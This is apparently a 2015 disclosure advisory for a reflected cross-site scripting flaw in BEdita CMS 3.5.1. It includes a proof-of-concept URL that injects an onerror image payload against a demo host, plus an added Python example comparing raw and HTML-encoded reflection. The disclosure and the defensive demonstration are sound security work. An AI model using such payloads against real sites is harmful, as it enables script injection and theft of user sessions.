
BEdita CMS 3.5.1 Cross Site Scripting

Posted on 04 March 2015

# Affected software: BEdita CMS
# Type of vulnerability: cross site scripting
# URL: bedita.com
# Discovered by: Provensec
# Website: http://www.provensec.com
# Description: BEdita is a web development framework that comes with a full-featured CMS out of the box.

# Proof of concept

The JavaScript executes on the login page if you are not logged in or no session has been initiated; otherwise it executes only on the respective page.

http://i.imgur.com/1wU6lX7.png

http://manage.demo.bedita.com/documents/index/id:%22%3E%3Cimg%20src=d%20onerror=confirm%281%29;%3E
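The following is an added example, not part of the original advisory and not BEdita code: it decodes the `id:` named parameter from the PoC URL and compares raw reflection with HTML-encoded output. The template, and the assumption that the value is echoed into a quoted attribute, are hypothetical.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# PoC URL from the advisory above.
POC = ("http://manage.demo.bedita.com/documents/index/"
       "id:%22%3E%3Cimg%20src=d%20onerror=confirm%281%29;%3E")

# Constructed template: assumes the id is echoed into a quoted attribute.
TEMPLATE = '<input type="hidden" name="id" value="{id}">'


def named_params(url):
    """Return percent-decoded name:value pairs found in the URL path."""
    params = {}
    for segment in urlsplit(url).path.split("/"):
        name, sep, value = segment.partition(":")
        if sep:
            params[name] = unquote(value)
    return params


def render(url, encode):
    """Fill the template with the id parameter, optionally HTML-encoded."""
    value = named_params(url).get("id", "")
    return TEMPLATE.format(id=escape(value, quote=True) if encode else value)


class HandlerFinder(HTMLParser):
    """Collects (tag, attribute) for every on* event-handler attribute."""
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        self.found += [(tag, k) for k, _ in attrs if k.startswith("on")]


def event_handlers(markup):
    """Parse markup and list the event-handler attributes it contains."""
    finder = HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.found


if __name__ == "__main__":
    for encode in (False, True):
        page = render(POC, encode)
        print(encode, page, event_handlers(page))
```

With raw reflection the decoded value closes the attribute and the parser sees a new `img` element carrying `onerror`; with encoding the whole value stays inside `value="..."` and no handler attribute is parsed.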

 
